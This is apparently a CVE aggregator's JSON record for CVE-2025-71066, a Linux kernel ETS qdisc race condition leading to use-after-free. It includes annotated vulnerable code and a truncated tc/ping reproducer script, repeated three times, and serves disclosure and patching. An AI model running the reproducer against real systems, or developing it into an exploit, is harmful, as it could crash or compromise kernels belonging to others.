{"api_version":"1","generated_at":"2026-06-04T10:13:29+00:00","cve":"CVE-2025-71066","urls":{"html":"https://cve.report/CVE-2025-71066","api":"https://cve.report/api/cve/CVE-2025-71066.json","docs":"https://cve.report/api","cve_org":"https://www.cve.org/CVERecord?id=CVE-2025-71066","nvd":"https://nvd.nist.gov/vuln/detail/CVE-2025-71066"},"summary":{"title":"net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change","description":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`.  It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n                          struct netlink_ext_ack *extack)\n{\n...\n\n      // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n      //to race with .dequeue handler (`ets_qdisc_dequeue`)\n      sch_tree_lock(sch);\n\n      for (i = nbands; i < oldbands; i++) {\n              if (i >= q->nstrict && q->classes[i].qdisc->q.qlen)\n                      list_del_init(&q->classes[i].alist);\n              qdisc_purge_queue(q->classes[i].qdisc);\n      }\n\n      WRITE_ONCE(q->nbands, nbands);\n      for (i = nstrict; i < q->nstrict; i++) {\n              if (q->classes[i].qdisc->q.qlen) {\n\t\t      // (2) the class is added to the q->active\n                      list_add_tail(&q->classes[i].alist, &q->active);\n                      q->classes[i].deficit = quanta[i];\n              }\n      }\n      WRITE_ONCE(q->nstrict, nstrict);\n      memcpy(q->prio2band, priomap, sizeof(priomap));\n\n      for (i = 0; i < q->nbands; i++)\n              WRITE_ONCE(q->classes[i].quantum, quanta[i]);\n\n      for (i = oldbands; i < q->nbands; i++) {\n              q->classes[i].qdisc = queues[i];\n              if (q->classes[i].qdisc != &noop_qdisc)\n                      qdisc_hash_add(q->classes[i].qdisc, true);\n      }\n\n      // (3) the qdisc is unlocked, now dequeue can be called in parallel\n      // to the rest of .change handler\n      sch_tree_unlock(sch);\n\n      ets_offload_change(sch);\n      for (i = q->nbands; i < oldbands; i++) {\n\t      // (4) we're reducing the refcount for our class's qdisc and\n\t      //  freeing it\n              qdisc_put(q->classes[i].qdisc);\n\t      // (5) If we call .dequeue between (4) and (5), we will have\n\t      // a strong UAF and we can control RIP\n              q->classes[i].qdisc = NULL;\n              WRITE_ONCE(q->classes[i].quantum, 0);\n              q->classes[i].deficit = 0;\n              gnet_stats_basic_sync_init(&q->classes[i].bstats);\n              memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats));\n      }\n      return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\"   # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n  tc qdisc del dev \"$DEV\" root 2>/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2>/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n  tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n  >/dev/null 2>&1 &\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---","state":"PUBLISHED","assigner":"Linux","published_at":"2026-01-13 16:16:05","updated_at":"2026-04-15 00:35:42"},"problem_types":["CWE-362 CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"],"metrics":[{"version":"3.1","source":"ADP","type":"DECLARED","score":"7.5","severity":"HIGH","vector":"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H","data":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","integrityImpact":"HIGH","privilegesRequired":"HIGH","scope":"CHANGED","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H","version":"3.1"}}],"references":[{"url":"https://git.kernel.org/stable/c/06bfb66a7c8b45e3fed01351a4b087410ae5ef39","name":"https://git.kernel.org/stable/c/06bfb66a7c8b45e3fed01351a4b087410ae5ef39","refsource":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":[],"title":"","mime":"","httpstatus":"","archivestatus":"0"},{"url":"https://git.kernel.org/stable/c/062d5d544e564473450d72e6af83077c2b2ff7c3","name":"https://git.kernel.org/stable/c/062d5d544e564473450d72e6af83077c2b2ff7c3","refsource":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":[],"title":"","mime":"","httpstatus":"","archivestatus":"0"},{"url":"https://git.kernel.org/stable/c/9987cda315c08f63a02423fa2f9a1f6602c861a0","name":"https://git.kernel.org/stable/c/9987cda315c08f63a02423fa2f9a1f6602c861a0","refsource":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":[],"title":"","mime":"","httpstatus":"","archivestatus":"0"},{"url":"https://git.kernel.org/stable/c/c7f6e7cc14df72b997258216e99d897d2df0dbbd","name":"https://git.kernel.org/stable/c/c7f6e7cc14df72b997258216e99d897d2df0dbbd","refsource":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":[],"title":"","mime":"","httpstatus":"","archivestatus":"0"},{"url":"https://git.kernel.org/stable/c/ce052b9402e461a9aded599f5b47e76bc727f7de","name":"https://git.kernel.org/stable/c/ce052b9402e461a9aded599f5b47e76bc727f7de","refsource":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":[],"title":"","mime":"","httpstatus":"","archivestatus":"0"},{"url":"https://git.kernel.org/stable/c/45466141da3c98a0c5fa88be0bc14b4b6a4bd75c","name":"https://git.kernel.org/stable/c/45466141da3c98a0c5fa88be0bc14b4b6a4bd75c","refsource":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":[],"title":"","mime":"","httpstatus":"","archivestatus":"0"},{"url":"https://git.kernel.org/stable/c/a75d617a4ef08682f5cfaadc01d5141c87e019c9","name":"https://git.kernel.org/stable/c/a75d617a4ef08682f5cfaadc01d5141c87e019c9","refsource":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":[],"title":"","mime":"","httpstatus":"","archivestatus":"0"},{"url":"https://www.cve.org/CVERecord?id=CVE-2025-71066","name":"CVE Program record","refsource":"CVE.ORG","tags":["canonical"]},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-71066","name":"NVD vulnerability detail","refsource":"NVD","tags":["canonical","analysis"]}],"affected":[{"source":"CNA","vendor":"Linux","product":"Linux","version":"affected ae2659d2c670252759ee9c823c4e039c0e05a6f2 062d5d544e564473450d72e6af83077c2b2ff7c3 git","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"affected e25bdbc7e951ae5728fee1f4c09485df113d013c c7f6e7cc14df72b997258216e99d897d2df0dbbd git","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"affected de6d25924c2a8c2988c6a385990cafbe742061bf a75d617a4ef08682f5cfaadc01d5141c87e019c9 git","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"affected de6d25924c2a8c2988c6a385990cafbe742061bf 9987cda315c08f63a02423fa2f9a1f6602c861a0 git","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"affected de6d25924c2a8c2988c6a385990cafbe742061bf 06bfb66a7c8b45e3fed01351a4b087410ae5ef39 git","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"affected de6d25924c2a8c2988c6a385990cafbe742061bf 45466141da3c98a0c5fa88be0bc14b4b6a4bd75c git","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"affected de6d25924c2a8c2988c6a385990cafbe742061bf ce052b9402e461a9aded599f5b47e76bc727f7de git","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"affected 5.16","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"unaffected 5.16 semver","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"unaffected 5.10.248 5.10.* semver","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"unaffected 5.15.198 5.15.* semver","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"unaffected 6.1.160 6.1.* semver","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"unaffected 6.6.120 6.6.* semver","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"unaffected 6.12.64 6.12.* semver","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"unaffected 6.18.3 6.18.* semver","platforms":[]},{"source":"CNA","vendor":"Linux","product":"Linux","version":"unaffected 6.19 * original_commit_for_fix","platforms":[]}],"timeline":[],"solutions":[],"workarounds":[],"exploits":[],"credits":[],"nvd_cpes":[],"vendor_comments":[],"enrichments":{"kev":null,"epss":{"cve_year":"2025","cve_id":"71066","cve":"CVE-2025-71066","epss":"0.000160000","percentile":"0.040660000","score_date":"2026-05-28","updated_at":"2026-05-29 00:13:16"},"legacy_qids":[]},"source_records":{"cve_program":{"containers":{"adp":[{"metrics":[{"cvssV3_1":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","integrityImpact":"HIGH","privilegesRequired":"HIGH","scope":"CHANGED","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H","version":"3.1"}},{"other":{"content":{"id":"CVE-2025-71066","options":[{"Exploitation":"none"},{"Automatable":"no"},{"Technical Impact":"total"}],"role":"CISA Coordinator","timestamp":"2026-05-22T03:55:51.470582Z","version":"2.0.3"},"type":"ssvc"}}],"problemTypes":[{"descriptions":[{"cweId":"CWE-362","description":"CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')","lang":"en","type":"CWE"}]}],"providerMetadata":{"dateUpdated":"2026-05-22T12:50:15.711Z","orgId":"134c704f-9b21-4f2e-91b3-4a467353bcc0","shortName":"CISA-ADP"},"title":"CISA ADP Vulnrichment"}],"cna":{"affected":[{"defaultStatus":"unaffected","product":"Linux","programFiles":["net/sched/sch_ets.c"],"repo":"https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git","vendor":"Linux","versions":[{"lessThan":"062d5d544e564473450d72e6af83077c2b2ff7c3","status":"affected","version":"ae2659d2c670252759ee9c823c4e039c0e05a6f2","versionType":"git"},{"lessThan":"c7f6e7cc14df72b997258216e99d897d2df0dbbd","status":"affected","version":"e25bdbc7e951ae5728fee1f4c09485df113d013c","versionType":"git"},{"lessThan":"a75d617a4ef08682f5cfaadc01d5141c87e019c9","status":"affected","version":"de6d25924c2a8c2988c6a385990cafbe742061bf","versionType":"git"},{"lessThan":"9987cda315c08f63a02423fa2f9a1f6602c861a0","status":"affected","version":"de6d25924c2a8c2988c6a385990cafbe742061bf","versionType":"git"},{"lessThan":"06bfb66a7c8b45e3fed01351a4b087410ae5ef39","status":"affected","version":"de6d25924c2a8c2988c6a385990cafbe742061bf","versionType":"git"},{"lessThan":"45466141da3c98a0c5fa88be0bc14b4b6a4bd75c","status":"affected","version":"de6d25924c2a8c2988c6a385990cafbe742061bf","versionType":"git"},{"lessThan":"ce052b9402e461a9aded599f5b47e76bc727f7de","status":"affected","version":"de6d25924c2a8c2988c6a385990cafbe742061bf","versionType":"git"}]},{"defaultStatus":"affected","product":"Linux","programFiles":["net/sched/sch_ets.c"],"repo":"https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git","vendor":"Linux","versions":[{"status":"affected","version":"5.16"},{"lessThan":"5.16","status":"unaffected","version":"0","versionType":"semver"},{"lessThanOrEqual":"5.10.*","status":"unaffected","version":"5.10.248","versionType":"semver"},{"lessThanOrEqual":"5.15.*","status":"unaffected","version":"5.15.198","versionType":"semver"},{"lessThanOrEqual":"6.1.*","status":"unaffected","version":"6.1.160","versionType":"semver"},{"lessThanOrEqual":"6.6.*","status":"unaffected","version":"6.6.120","versionType":"semver"},{"lessThanOrEqual":"6.12.*","status":"unaffected","version":"6.12.64","versionType":"semver"},{"lessThanOrEqual":"6.18.*","status":"unaffected","version":"6.18.3","versionType":"semver"},{"lessThanOrEqual":"*","status":"unaffected","version":"6.19","versionType":"original_commit_for_fix"}]}],"cpeApplicability":[{"nodes":[{"cpeMatch":[{"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionEndExcluding":"5.10.248","versionStartIncluding":"5.10.83","vulnerable":true},{"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionEndExcluding":"5.15.198","versionStartIncluding":"5.15.6","vulnerable":true},{"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionEndExcluding":"6.1.160","versionStartIncluding":"5.16","vulnerable":true},{"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionEndExcluding":"6.6.120","versionStartIncluding":"5.16","vulnerable":true},{"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionEndExcluding":"6.12.64","versionStartIncluding":"5.16","vulnerable":true},{"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionEndExcluding":"6.18.3","versionStartIncluding":"5.16","vulnerable":true},{"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionEndExcluding":"6.19","versionStartIncluding":"5.16","vulnerable":true}],"negate":false,"operator":"OR"}]}],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`.  It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n                          struct netlink_ext_ack *extack)\n{\n...\n\n      // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n      //to race with .dequeue handler (`ets_qdisc_dequeue`)\n      sch_tree_lock(sch);\n\n      for (i = nbands; i < oldbands; i++) {\n              if (i >= q->nstrict && q->classes[i].qdisc->q.qlen)\n                      list_del_init(&q->classes[i].alist);\n              qdisc_purge_queue(q->classes[i].qdisc);\n      }\n\n      WRITE_ONCE(q->nbands, nbands);\n      for (i = nstrict; i < q->nstrict; i++) {\n              if (q->classes[i].qdisc->q.qlen) {\n\t\t      // (2) the class is added to the q->active\n                      list_add_tail(&q->classes[i].alist, &q->active);\n                      q->classes[i].deficit = quanta[i];\n              }\n      }\n      WRITE_ONCE(q->nstrict, nstrict);\n      memcpy(q->prio2band, priomap, sizeof(priomap));\n\n      for (i = 0; i < q->nbands; i++)\n              WRITE_ONCE(q->classes[i].quantum, quanta[i]);\n\n      for (i = oldbands; i < q->nbands; i++) {\n              q->classes[i].qdisc = queues[i];\n              if (q->classes[i].qdisc != &noop_qdisc)\n                      qdisc_hash_add(q->classes[i].qdisc, true);\n      }\n\n      // (3) the qdisc is unlocked, now dequeue can be called in parallel\n      // to the rest of .change handler\n      sch_tree_unlock(sch);\n\n      ets_offload_change(sch);\n      for (i = q->nbands; i < oldbands; i++) {\n\t      // (4) we're reducing the refcount for our class's qdisc and\n\t      //  freeing it\n              qdisc_put(q->classes[i].qdisc);\n\t      // (5) If we call .dequeue between (4) and (5), we will have\n\t      // a strong UAF and we can control RIP\n              q->classes[i].qdisc = NULL;\n              WRITE_ONCE(q->classes[i].quantum, 0);\n              q->classes[i].deficit = 0;\n              gnet_stats_basic_sync_init(&q->classes[i].bstats);\n              memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats));\n      }\n      return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\"   # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n  tc qdisc del dev \"$DEV\" root 2>/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2>/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n  tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n  >/dev/null 2>&1 &\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---"}],"providerMetadata":{"dateUpdated":"2026-05-11T21:54:04.683Z","orgId":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","shortName":"Linux"},"references":[{"url":"https://git.kernel.org/stable/c/062d5d544e564473450d72e6af83077c2b2ff7c3"},{"url":"https://git.kernel.org/stable/c/c7f6e7cc14df72b997258216e99d897d2df0dbbd"},{"url":"https://git.kernel.org/stable/c/a75d617a4ef08682f5cfaadc01d5141c87e019c9"},{"url":"https://git.kernel.org/stable/c/9987cda315c08f63a02423fa2f9a1f6602c861a0"},{"url":"https://git.kernel.org/stable/c/06bfb66a7c8b45e3fed01351a4b087410ae5ef39"},{"url":"https://git.kernel.org/stable/c/45466141da3c98a0c5fa88be0bc14b4b6a4bd75c"},{"url":"https://git.kernel.org/stable/c/ce052b9402e461a9aded599f5b47e76bc727f7de"}],"title":"net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change","x_generator":{"engine":"bippy-1.2.0"}}},"cveMetadata":{"assignerOrgId":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","assignerShortName":"Linux","cveId":"CVE-2025-71066","datePublished":"2026-01-13T15:31:21.931Z","dateReserved":"2026-01-13T15:30:19.646Z","dateUpdated":"2026-05-22T12:50:15.711Z","state":"PUBLISHED"},"dataType":"CVE_RECORD","dataVersion":"5.2"},"nvd":{"publishedDate":"2026-01-13 16:16:05","lastModifiedDate":"2026-04-15 00:35:42","problem_types":["CWE-362 CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"],"metrics":[],"configurations":[]},"legacy_mitre":{"record":{"CveYear":"2025","CveId":"71066","Ordinal":"1","Title":"net/sched: ets: Always remove class from active list before dele","CVE":"CVE-2025-71066","Year":"2025"},"notes":[{"CveYear":"2025","CveId":"71066","Ordinal":"1","NoteData":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`.  It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n                          struct netlink_ext_ack *extack)\n{\n...\n\n      // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n      //to race with .dequeue handler (`ets_qdisc_dequeue`)\n      sch_tree_lock(sch);\n\n      for (i = nbands; i < oldbands; i++) {\n              if (i >= q->nstrict && q->classes[i].qdisc->q.qlen)\n                      list_del_init(&q->classes[i].alist);\n              qdisc_purge_queue(q->classes[i].qdisc);\n      }\n\n      WRITE_ONCE(q->nbands, nbands);\n      for (i = nstrict; i < q->nstrict; i++) {\n              if (q->classes[i].qdisc->q.qlen) {\n\t\t      // (2) the class is added to the q->active\n                      list_add_tail(&q->classes[i].alist, &q->active);\n                      q->classes[i].deficit = quanta[i];\n              }\n      }\n      WRITE_ONCE(q->nstrict, nstrict);\n      memcpy(q->prio2band, priomap, sizeof(priomap));\n\n      for (i = 0; i < q->nbands; i++)\n              WRITE_ONCE(q->classes[i].quantum, quanta[i]);\n\n      for (i = oldbands; i < q->nbands; i++) {\n              q->classes[i].qdisc = queues[i];\n              if (q->classes[i].qdisc != &noop_qdisc)\n                      qdisc_hash_add(q->classes[i].qdisc, true);\n      }\n\n      // (3) the qdisc is unlocked, now dequeue can be called in parallel\n      // to the rest of .change handler\n      sch_tree_unlock(sch);\n\n      ets_offload_change(sch);\n      for (i = q->nbands; i < oldbands; i++) {\n\t      // (4) we're reducing the refcount for our class's qdisc and\n\t      //  freeing it\n              qdisc_put(q->classes[i].qdisc);\n\t      // (5) If we call .dequeue between (4) and (5), we will have\n\t      // a strong UAF and we can control RIP\n              q->classes[i].qdisc = NULL;\n              WRITE_ONCE(q->classes[i].quantum, 0);\n              q->classes[i].deficit = 0;\n              gnet_stats_basic_sync_init(&q->classes[i].bstats);\n              memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats));\n      }\n      return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\"   # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n  tc qdisc del dev \"$DEV\" root 2>/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2>/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n  tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n  >/dev/null 2>&1 &\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---","Type":"Description","Title":"net/sched: ets: Always remove class from active list before dele"}]}}}